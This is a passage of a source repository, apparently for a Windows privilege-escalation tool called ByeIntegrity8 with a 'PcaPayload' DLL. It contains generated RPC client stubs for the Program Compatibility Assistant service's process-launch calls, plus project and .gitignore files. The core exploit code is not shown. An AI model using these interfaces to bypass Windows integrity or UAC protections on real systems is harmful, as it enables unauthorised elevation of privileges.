| { 108 | 109 | CLIENT_CALL_RETURN _RetVal; 110 | 111 | _RetVal = NdrClientCall2( 112 | ( PMIDL_STUB_DESC )&PcaService7_StubDesc, 113 | (PFORMAT_STRING) &pcasvc7__MIDL_ProcFormatString.Format[0], 114 | bindingHandle, 115 | exePathName, 116 | unknown0, 117 | processId); 118 | return ( long )_RetVal.Simple; 119 | 120 | } 121 | 122 | 123 | #if !defined(__RPC_WIN64__) 124 | #error Invalid build platform for this stub. 125 | #endif 126 | 127 | static const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString = 128 | { 129 | 0, 130 | { 131 | 132 | /* Procedure RAiNotifyUserCallbackExceptionProcess */ 133 | 134 | 0x0, /* 0 */ 135 | 0x48, /* Old Flags: */ 136 | /* 2 */ NdrFcLong( 0x0 ), /* 0 */ 137 | /* 6 */ NdrFcShort( 0x4 ), /* 4 */ 138 | /* 8 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ 139 | /* 10 */ 0x32, /* FC_BIND_PRIMITIVE */ 140 | 0x0, /* 0 */ 141 | /* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 142 | /* 14 */ NdrFcShort( 0x10 ), /* 16 */ 143 | /* 16 */ NdrFcShort( 0x8 ), /* 8 */ 144 | /* 18 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ 145 | 0x4, /* 4 */ 146 | /* 20 */ 0xa, /* 10 */ 147 | 0x1, /* Ext Flags: new corr desc, */ 148 | /* 22 */ NdrFcShort( 0x0 ), /* 0 */ 149 | /* 24 */ NdrFcShort( 0x0 ), /* 0 */ 150 | /* 26 */ NdrFcShort( 0x0 ), /* 0 */ 151 | /* 28 */ NdrFcShort( 0x0 ), /* 0 */ 152 | 153 | /* Parameter exePathName */ 154 | 155 | /* 30 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ 156 | /* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 157 | /* 34 */ NdrFcShort( 0x4 ), /* Type Offset=4 */ 158 | 159 | /* Parameter unknown0 */ 160 | 161 | /* 36 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ 162 | /* 38 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 163 | /* 40 */ 0x8, /* FC_LONG */ 164 | 0x0, /* 0 */ 165 | 166 | /* Parameter processId */ 167 | 168 | /* 42 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ 169 | /* 44 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ 170 | /* 46 */ 0x8, /* FC_LONG */ 171 | 0x0, /* 0 */ 172 | 173 | /* Return value */ 174 | 175 | /* 48 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ 176 | /* 50 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ 177 | /* 52 */ 0x8, /* FC_LONG */ 178 | 0x0, /* 0 */ 179 | 180 | 0x0 181 | } 182 | }; 183 | 184 | static const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString = 185 | { 186 | 0, 187 | { 188 | NdrFcShort( 0x0 ), /* 0 */ 189 | /* 2 */ 190 | 0x11, 0x8, /* FC_RP [simple_pointer] */ 191 | /* 4 */ 192 | 0x25, /* FC_C_WSTRING */ 193 | 0x5c, /* FC_PAD */ 194 | 195 | 0x0 196 | } 197 | }; 198 | 199 | static const unsigned short PcaService7_FormatStringOffsetTable[] = 200 | { 201 | 0 202 | }; 203 | 204 | 205 | static const MIDL_STUB_DESC PcaService7_StubDesc = 206 | { 207 | (void *)& PcaService7___RpcClientInterface, 208 | MIDL_user_allocate, 209 | MIDL_user_free, 210 | &PcaService7__MIDL_AutoBindHandle, 211 | 0, 212 | 0, 213 | 0, 214 | 0, 215 | pcasvc7__MIDL_TypeFormatString.Format, 216 | 1, /* -error bounds_check flag */ 217 | 0x50002, /* Ndr library version */ 218 | 0, 219 | 0x801026e, /* MIDL Version 8.1.622 */ 220 | 0, 221 | 0, 222 | 0, /* notify & notify_flag routine table */ 223 | 0x1, /* MIDL flag */ 224 | 0, /* cs routines */ 225 | 0, /* proxy/server info */ 226 | 0 227 | }; 228 | #if _MSC_VER >= 1200 229 | #pragma warning(pop) 230 | #endif 231 | 232 | 233 | #endif /* defined(_M_AMD64)*/ 234 | 235 | -------------------------------------------------------------------------------- /PcaPayload/PcaPayload.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {2702ad93-dc30-427f-aa64-deb4cc2ea0a0} 25 | PcaPayload 26 | 10.0 27 | 28 | 29 | 30 | DynamicLibrary 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | DynamicLibrary 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | DynamicLibrary 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | DynamicLibrary 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | MultiThreaded 106 | 107 | 108 | Console 109 | true 110 | true 111 | true 112 | 113 | 114 | 115 | 116 | Level3 117 | true 118 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | true 120 | 121 | 122 | Console 123 | true 124 | 125 | 126 | 127 | 128 | Level3 129 | true 130 | true 131 | true 132 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 133 | true 134 | MultiThreaded 135 | 136 | 137 | Console 138 | true 139 | true 140 | true 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Oo]ut/ 33 | [Ll]og/ 34 | [Ll]ogs/ 35 | 36 | # Visual Studio 2015/2017 cache/options directory 37 | .vs/ 38 | # Uncomment if you have tasks that create the project's static files in wwwroot 39 | #wwwroot/ 40 | 41 | # Visual Studio 2017 auto generated files 42 | Generated\ Files/ 43 | 44 | # MSTest test Results 45 | [Tt]est[Rr]esult*/ 46 | [Bb]uild[Ll]og.* 47 | 48 | # NUnit 49 | *.VisualState.xml 50 | TestResult.xml 51 | nunit-*.xml 52 | 53 | # Build Results of an ATL Project 54 | [Dd]ebugPS/ 55 | [Rr]eleasePS/ 56 | dlldata.c 57 | 58 | # Benchmark Results 59 | BenchmarkDotNet.Artifacts/ 60 | 61 | # .NET Core 62 | project.lock.json 63 | project.fragment.lock.json 64 | artifacts/ 65 | 66 | # ASP.NET Scaffolding 67 | ScaffoldingReadMe.txt 68 | 69 | # StyleCop 70 | StyleCopReport.xml 71 | 72 | # Files built by Visual Studio 73 | *_i.c 74 | *_p.c 75 | *_h.h 76 | *.ilk 77 | *.meta 78 | *.obj 79 | *.iobj 80 | *.pch 81 | *.pdb 82 | *.ipdb 83 | *.pgc 84 | *.pgd 85 | *.rsp 86 | *.sbr 87 | *.tlb 88 | *.tli 89 | *.tlh 90 | *.tmp 91 | *.tmp_proj 92 | *_wpftmp.csproj 93 | *.log 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Microsoft Azure Build Output 210 | csx/ 211 | *.build.csdef 212 | 213 | # Microsoft Azure Emulator 214 | ecf/ 215 | rcf/ 216 | 217 | # Windows Store app package directories and files 218 | AppPackages/ 219 | BundleArtifacts/ 220 | Package.StoreAssociation.xml 221 | _pkginfo.txt 222 | *.appx 223 | *.appxbundle 224 | *.appxupload 225 | 226 | # Visual Studio cache files 227 | # files ending in .cache can be ignored 228 | *.[Cc]ache 229 | # but keep track of directories ending in .cache 230 | !?*.[Cc]ache/ 231 | 232 | # Others 233 | ClientBin/ 234 | ~$* 235 | *~ 236 | *.dbmdl 237 | *.dbproj.schemaview 238 | *.jfm 239 | *.pfx 240 | *.publishsettings 241 | orleans.codegen.cs 242 | 243 | # Including strong name files can present a security risk 244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 245 | #*.snk 246 | 247 | # Since there are multiple workflows, uncomment next line to ignore bower_components 248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 249 | #bower_components/ 250 | 251 | # RIA/Silverlight projects 252 | Generated_Code/ 253 | 254 | # Backup & report files from converting an old project file 255 | # to a newer Visual Studio version. Backup files are not needed, 256 | # because we have git ;-) 257 | _UpgradeReport_Files/ 258 | Backup*/ 259 | UpgradeLog*.XML 260 | UpgradeLog*.htm 261 | ServiceFabricBackup/ 262 | *.rptproj.bak 263 | 264 | # SQL Server files 265 | *.mdf 266 | *.ldf 267 | *.ndf 268 | 269 | # Business Intelligence projects 270 | *.rdl.data 271 | *.bim.layout 272 | *.bim_*.settings 273 | *.rptproj.rsuser 274 | *- [Bb]ackup.rdl 275 | *- [Bb]ackup ([0-9]).rdl 276 | *- [Bb]ackup ([0-9][0-9]).rdl 277 | 278 | # Microsoft Fakes 279 | FakesAssemblies/ 280 | 281 | # GhostDoc plugin setting file 282 | *.GhostDoc.xml 283 | 284 | # Node.js Tools for Visual Studio 285 | .ntvs_analysis.dat 286 | node_modules/ 287 | 288 | # Visual Studio 6 build log 289 | *.plg 290 | 291 | # Visual Studio 6 workspace options file 292 | *.opt 293 | 294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 295 | *.vbw 296 | 297 | # Visual Studio LightSwitch build output 298 | **/*.HTMLClient/GeneratedArtifacts 299 | **/*.DesktopClient/GeneratedArtifacts 300 | **/*.DesktopClient/ModelManifest.xml 301 | **/*.Server/GeneratedArtifacts 302 | **/*.Server/ModelManifest.xml 303 | _Pvt_Extensions 304 | 305 | # Paket dependency manager 306 | .paket/paket.exe 307 | paket-files/ 308 | 309 | # FAKE - F# Make 310 | .fake/ 311 | 312 | # CodeRush personal settings 313 | .cr/personal 314 | 315 | # Python Tools for Visual Studio (PTVS) 316 | __pycache__/ 317 | *.pyc 318 | 319 | # Cake - Uncomment if you are using it 320 | # tools/** 321 | # !tools/packages.config 322 | 323 | # Tabs Studio 324 | *.tss 325 | 326 | # Telerik's JustMock configuration file 327 | *.jmconfig 328 | 329 | # BizTalk build output 330 | *.btp.cs 331 | *.btm.cs 332 | *.odx.cs 333 | *.xsd.cs 334 | 335 | # OpenCover UI analysis results 336 | OpenCover/ 337 | 338 | # Azure Stream Analytics local run output 339 | ASALocalRun/ 340 | 341 | # MSBuild Binary and Structured Log 342 | *.binlog 343 | 344 | # NVidia Nsight GPU debugger configuration file 345 | *.nvuser 346 | 347 | # MFractors (Xamarin productivity tool) working folder 348 | .mfractor/ 349 | 350 | # Local History for Visual Studio 351 | .localhistory/ 352 | 353 | # BeatPulse healthcheck temp database 354 | healthchecksdb 355 | 356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 357 | MigrationBackup/ 358 | 359 | # Ionide (cross platform F# VS Code tools) working folder 360 | .ionide/ 361 | 362 | # Fody - auto-generated XML schema 363 | FodyWeavers.xsd -------------------------------------------------------------------------------- /ByeIntegrity8/ByeIntegrity8.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {f04acb28-ca8b-40a8-9d8b-3d2550bce0cd} 25 | ByeIntegrity8 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | taskschd.lib;rpcrt4.lib;%(AdditionalDependencies) 96 | 97 | 98 | 99 | 100 | Level3 101 | true 102 | true 103 | true 104 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 105 | true 106 | 107 | 108 | Console 109 | true 110 | true 111 | true 112 | taskschd.lib;rpcrt4.lib;%(AdditionalDependencies) 113 | 114 | 115 | 116 | 117 | Level3 118 | true 119 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | true 121 | 122 | 123 | Console 124 | true 125 | taskschd.lib;rpcrt4.lib;%(AdditionalDependencies) 126 | 127 | 128 | 129 | 130 | Level3 131 | true 132 | true 133 | true 134 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 135 | true 136 | 137 | 138 | Console 139 | true 140 | true 141 | true 142 | taskschd.lib;rpcrt4.lib;%(AdditionalDependencies) 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | true 163 | true 164 | true 165 | true 166 | false 167 | false 168 | false 169 | false 170 | 171 | 172 | 173 | 174 | true 175 | false 176 | true 177 | false 178 | true 179 | false 180 | true 181 | false 182 | 183 | 184 | 185 | 186 | %(Filename).h 187 | None 188 | %(Filename).h 189 | None 190 | %(Filename).h 191 | None 192 | %(Filename).h 193 | None 194 | true 195 | true 196 | true 197 | true 198 | 199 | 200 | 201 | 202 | 203 | -------------------------------------------------------------------------------- /ByeIntegrity8/pcasvc_c.c: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the RPC client stubs */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.01.0622 */ 7 | /* at Mon Jan 18 19:14:07 2038 8 | */ 9 | /* Compiler settings for pcasvc.idl: 10 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 11 | protocol : all , ms_ext, c_ext, robust 12 | error checks: allocation ref bounds_check enum stub_data 13 | VC __declspec() decoration level: 14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 15 | DECLSPEC_UUID(), MIDL_INTERFACE() 16 | */ 17 | /* @@MIDL_FILE_HEADING( ) */ 18 | 19 | #if defined(_M_AMD64) 20 | 21 | 22 | #if _MSC_VER >= 1200 23 | #pragma warning(push) 24 | #endif 25 | 26 | #pragma warning( disable: 4211 ) /* redefine extern to static */ 27 | #pragma warning( disable: 4232 ) /* dllimport identity*/ 28 | #pragma warning( disable: 4024 ) /* array to pointer mapping*/ 29 | 30 | #include 31 | 32 | #include "pcasvc.h" 33 | 34 | #define TYPE_FORMAT_STRING_SIZE 7 35 | #define PROC_FORMAT_STRING_SIZE 73 36 | #define EXPR_FORMAT_STRING_SIZE 1 37 | #define TRANSMIT_AS_TABLE_SIZE 0 38 | #define WIRE_MARSHAL_TABLE_SIZE 0 39 | 40 | typedef struct _pcasvc_MIDL_TYPE_FORMAT_STRING 41 | { 42 | short Pad; 43 | unsigned char Format[ TYPE_FORMAT_STRING_SIZE ]; 44 | } pcasvc_MIDL_TYPE_FORMAT_STRING; 45 | 46 | typedef struct _pcasvc_MIDL_PROC_FORMAT_STRING 47 | { 48 | short Pad; 49 | unsigned char Format[ PROC_FORMAT_STRING_SIZE ]; 50 | } pcasvc_MIDL_PROC_FORMAT_STRING; 51 | 52 | typedef struct _pcasvc_MIDL_EXPR_FORMAT_STRING 53 | { 54 | long Pad; 55 | unsigned char Format[ EXPR_FORMAT_STRING_SIZE ]; 56 | } pcasvc_MIDL_EXPR_FORMAT_STRING; 57 | 58 | 59 | static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = 60 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}; 61 | 62 | static const RPC_SYNTAX_IDENTIFIER _NDR64_RpcTransferSyntax = 63 | {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}; 64 | 65 | 66 | 67 | extern const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString; 68 | extern const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString; 69 | extern const pcasvc_MIDL_EXPR_FORMAT_STRING pcasvc__MIDL_ExprFormatString; 70 | 71 | #define GENERIC_BINDING_TABLE_SIZE 0 72 | 73 | 74 | /* Standard interface: PcaService, ver. 1.0, 75 | GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */ 76 | 77 | extern const MIDL_STUBLESS_PROXY_INFO PcaService_ProxyInfo; 78 | 79 | 80 | static const RPC_CLIENT_INTERFACE PcaService___RpcClientInterface = 81 | { 82 | sizeof(RPC_CLIENT_INTERFACE), 83 | {{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}}, 84 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 85 | 0, 86 | 0, 87 | 0, 88 | 0, 89 | &PcaService_ProxyInfo, 90 | 0x02000000 91 | }; 92 | RPC_IF_HANDLE PcaService_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService___RpcClientInterface; 93 | 94 | extern const MIDL_STUB_DESC PcaService_StubDesc; 95 | 96 | static RPC_BINDING_HANDLE PcaService__MIDL_AutoBindHandle; 97 | 98 | 99 | long RAiMonitorProcess( 100 | handle_t bindingHandle, 101 | /* [in] */ unsigned __int3264 hProcess, 102 | /* [in] */ long unknown0, 103 | /* [string][unique][in] */ wchar_t *exeFileName, 104 | /* [string][unique][in] */ wchar_t *cmdLine, 105 | /* [string][unique][in] */ wchar_t *workingDir, 106 | /* [in] */ long flags) 107 | { 108 | 109 | CLIENT_CALL_RETURN _RetVal; 110 | 111 | _RetVal = NdrClientCall3( 112 | ( PMIDL_STUBLESS_PROXY_INFO )&PcaService_ProxyInfo, 113 | 0, 114 | 0, 115 | bindingHandle, 116 | hProcess, 117 | unknown0, 118 | exeFileName, 119 | cmdLine, 120 | workingDir, 121 | flags); 122 | return ( long )_RetVal.Simple; 123 | 124 | } 125 | 126 | 127 | #if !defined(__RPC_WIN64__) 128 | #error Invalid build platform for this stub. 129 | #endif 130 | 131 | static const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString = 132 | { 133 | 0, 134 | { 135 | 136 | /* Procedure RAiMonitorProcess */ 137 | 138 | 0x0, /* 0 */ 139 | 0x48, /* Old Flags: */ 140 | /* 2 */ NdrFcLong( 0x0 ), /* 0 */ 141 | /* 6 */ NdrFcShort( 0x0 ), /* 0 */ 142 | /* 8 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ 143 | /* 10 */ 0x32, /* FC_BIND_PRIMITIVE */ 144 | 0x0, /* 0 */ 145 | /* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 146 | /* 14 */ NdrFcShort( 0x18 ), /* 24 */ 147 | /* 16 */ NdrFcShort( 0x8 ), /* 8 */ 148 | /* 18 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ 149 | 0x7, /* 7 */ 150 | /* 20 */ 0xa, /* 10 */ 151 | 0x1, /* Ext Flags: new corr desc, */ 152 | /* 22 */ NdrFcShort( 0x0 ), /* 0 */ 153 | /* 24 */ NdrFcShort( 0x0 ), /* 0 */ 154 | /* 26 */ NdrFcShort( 0x0 ), /* 0 */ 155 | /* 28 */ NdrFcShort( 0x0 ), /* 0 */ 156 | 157 | /* Parameter hProcess */ 158 | 159 | /* 30 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ 160 | /* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 161 | /* 34 */ 0xb9, /* FC_UINT3264 */ 162 | 0x0, /* 0 */ 163 | 164 | /* Parameter unknown0 */ 165 | 166 | /* 36 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ 167 | /* 38 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 168 | /* 40 */ 0x8, /* FC_LONG */ 169 | 0x0, /* 0 */ 170 | 171 | /* Parameter exeFileName */ 172 | 173 | /* 42 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ 174 | /* 44 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ 175 | /* 46 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 176 | 177 | /* Parameter cmdLine */ 178 | 179 | /* 48 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ 180 | /* 50 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ 181 | /* 52 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 182 | 183 | /* Parameter workingDir */ 184 | 185 | /* 54 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ 186 | /* 56 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ 187 | /* 58 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 188 | 189 | /* Parameter flags */ 190 | 191 | /* 60 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ 192 | /* 62 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ 193 | /* 64 */ 0x8, /* FC_LONG */ 194 | 0x0, /* 0 */ 195 | 196 | /* Return value */ 197 | 198 | /* 66 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ 199 | /* 68 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ 200 | /* 70 */ 0x8, /* FC_LONG */ 201 | 0x0, /* 0 */ 202 | 203 | 0x0 204 | } 205 | }; 206 | 207 | static const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString = 208 | { 209 | 0, 210 | { 211 | NdrFcShort( 0x0 ), /* 0 */ 212 | /* 2 */ 213 | 0x12, 0x8, /* FC_UP [simple_pointer] */ 214 | /* 4 */ 215 | 0x25, /* FC_C_WSTRING */ 216 | 0x5c, /* FC_PAD */ 217 | 218 | 0x0 219 | } 220 | }; 221 | 222 | static const unsigned short PcaService_FormatStringOffsetTable[] = 223 | { 224 | 0 225 | }; 226 | 227 | 228 | 229 | #endif /* defined(_M_AMD64)*/ 230 | 231 | 232 | 233 | /* this ALWAYS GENERATED file contains the RPC client stubs */ 234 | 235 | 236 | /* File created by MIDL compiler version 8.01.0622 */ 237 | /* at Mon Jan 18 19:14:07 2038 238 | */ 239 | /* Compiler settings for pcasvc.idl: 240 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 241 | protocol : all , ms_ext, c_ext, robust 242 | error checks: allocation ref bounds_check enum stub_data 243 | VC __declspec() decoration level: 244 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 245 | DECLSPEC_UUID(), MIDL_INTERFACE() 246 | */ 247 | /* @@MIDL_FILE_HEADING( ) */ 248 | 249 | #if defined(_M_AMD64) 250 | 251 | 252 | 253 | 254 | #if !defined(__RPC_WIN64__) 255 | #error Invalid build platform for this stub. 256 | #endif 257 | 258 | 259 | #include "ndr64types.h" 260 | #include "pshpack8.h" 261 | 262 | 263 | typedef 264 | NDR64_FORMAT_CHAR 265 | __midl_frag12_t; 266 | extern const __midl_frag12_t __midl_frag12; 267 | 268 | typedef 269 | struct _NDR64_CONFORMANT_STRING_FORMAT 270 | __midl_frag10_t; 271 | extern const __midl_frag10_t __midl_frag10; 272 | 273 | typedef 274 | struct _NDR64_POINTER_FORMAT 275 | __midl_frag9_t; 276 | extern const __midl_frag9_t __midl_frag9; 277 | 278 | typedef 279 | NDR64_FORMAT_CHAR 280 | __midl_frag3_t; 281 | extern const __midl_frag3_t __midl_frag3; 282 | 283 | typedef 284 | struct 285 | { 286 | struct _NDR64_PROC_FORMAT frag1; 287 | struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2; 288 | struct _NDR64_PARAM_FORMAT frag3; 289 | struct _NDR64_PARAM_FORMAT frag4; 290 | struct _NDR64_PARAM_FORMAT frag5; 291 | struct _NDR64_PARAM_FORMAT frag6; 292 | struct _NDR64_PARAM_FORMAT frag7; 293 | struct _NDR64_PARAM_FORMAT frag8; 294 | struct _NDR64_PARAM_FORMAT frag9; 295 | } 296 | __midl_frag2_t; 297 | extern const __midl_frag2_t __midl_frag2; 298 | 299 | typedef 300 | NDR64_FORMAT_UINT32 301 | __midl_frag1_t; 302 | extern const __midl_frag1_t __midl_frag1; 303 | 304 | static const __midl_frag12_t __midl_frag12 = 305 | 0x5 /* FC64_INT32 */; 306 | 307 | static const __midl_frag10_t __midl_frag10 = 308 | { 309 | /* *wchar_t */ 310 | { 311 | /* *wchar_t */ 312 | 0x64, /* FC64_CONF_WCHAR_STRING */ 313 | { 314 | /* *wchar_t */ 315 | 0, 316 | 0, 317 | 0, 318 | 0, 319 | 0, 320 | 0, 321 | 0, 322 | 0 323 | }, 324 | (NDR64_UINT16) 2 /* 0x2 */ 325 | } 326 | }; 327 | 328 | static const __midl_frag9_t __midl_frag9 = 329 | { 330 | /* *wchar_t */ 331 | 0x21, /* FC64_UP */ 332 | (NDR64_UINT8) 0 /* 0x0 */, 333 | (NDR64_UINT16) 0 /* 0x0 */, 334 | &__midl_frag10 335 | }; 336 | 337 | static const __midl_frag3_t __midl_frag3 = 338 | 0x7 /* FC64_INT64 */; 339 | 